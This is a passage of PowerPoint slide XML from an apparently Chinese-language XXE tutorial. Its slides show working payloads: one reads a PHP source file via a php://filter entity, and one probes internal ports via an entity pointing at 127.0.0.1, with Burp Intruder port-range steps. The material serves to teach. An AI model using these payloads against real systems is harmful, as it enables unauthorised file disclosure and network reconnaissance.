              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2598907" y="1438140"/>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查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源代码</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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2598907" y="2562043"/>
            <a:ext cx="8314429" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C6370"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOCTYPE ANY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://filter/convert.base64-encode/resource=D:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>phpstudy_pro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/WWW/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]&gt;</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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>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a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2497842" y="4431993"/>
            <a:ext cx="4584358" cy="1717463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4262808" y="337827"/>
            <a:ext cx="3680220" cy="686293"/>
            <a:chOff x="4420971" y="414829"/>
            <a:chExt cx="3680220" cy="686293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="文本框 13"/>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6" name="Group 55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5898809" y="1028097"/>
              <a:ext cx="362272" cy="73025"/>
              <a:chOff x="7340600" y="4686300"/>
              <a:chExt cx="504030" cy="101600"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="5EE2B1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1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2"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9"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4" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2168260" y="1177143"/>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查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源代码</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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2396767" y="1854053"/>
            <a:ext cx="4584358" cy="1717463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2396767" y="3681329"/>
            <a:ext cx="6029369" cy="3124223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7472517" y="1961360"/>
            <a:ext cx="4002905" cy="1546065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4262808" y="337827"/>
            <a:ext cx="3680220" cy="686293"/>
            <a:chOff x="4420971" y="414829"/>
            <a:chExt cx="3680220" cy="686293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 10"/>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2" name="Group 55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5898809" y="1028097"/>
              <a:ext cx="362272" cy="73025"/>
              <a:chOff x="7340600" y="4686300"/>
              <a:chExt cx="504030" cy="101600"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="5EE2B1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13"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4"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4" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2230968" y="1230082"/>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探测内网端口</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2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4262808" y="337827"/>
            <a:ext cx="3680220" cy="686293"/>
            <a:chOff x="4420971" y="414829"/>
            <a:chExt cx="3680220" cy="686293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 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7" name="Group 55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5898809" y="1028097"/>
              <a:ext cx="362272" cy="73025"/>
              <a:chOff x="7340600" y="4686300"/>
              <a:chExt cx="504030" cy="101600"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="5EE2B1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="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14" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2293676" y="1993257"/>
            <a:ext cx="8797548" cy="458202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>可根据返回信息内容的接收响应时间来判断该端口是否打开。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2293676" y="2601224"/>
            <a:ext cx="8314429" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C6370"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOCTYPE foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "http://127.0.0.1:81" &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>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foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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937" r="421" b="6394"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1256357" y="4057579"/>
            <a:ext cx="9506893" cy="2209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4" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2341514" y="1259191"/>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探测内网端口</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2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4262808" y="337827"/>
            <a:ext cx="3680220" cy="686293"/>
            <a:chOff x="4420971" y="414829"/>
            <a:chExt cx="3680220" cy="686293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 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7" name="Group 55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5898809" y="1028097"/>
              <a:ext cx="362272" cy="73025"/>
              <a:chOff x="7340600" y="4686300"/>
              <a:chExt cx="504030" cy="101600"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="5EE2B1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="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14" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2341514" y="1952727"/>
            <a:ext cx="8797548" cy="462819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>模块：设置负载位置为端口，载荷为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>1-100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>的连续整数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>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8" b="5847"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="329939" y="2670527"/>
            <a:ext cx="11545957" cy="352658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23925" y="2666100"/>
            <a:ext cx="4752850" cy="35506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4" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2168260" y="1177143"/>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探测内网端口</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2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4262808" y="337827"/>
            <a:ext cx="3680220" cy="686293"/>
            <a:chOff x="4420971" y="414829"/>
            <a:chExt cx="3680220" cy="686293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 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7" name="Group 55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5898809" y="1028097"/>
              <a:ext cx="362272" cy="73025"/>
              <a:chOff x="7340600" y="4686300"/>
              <a:chExt cx="504030" cy="101600"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="5EE2B1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="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14" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2168260" y="1961360"/>
            <a:ext cx="8797548" cy="462819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>通过接收响应时间可以判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
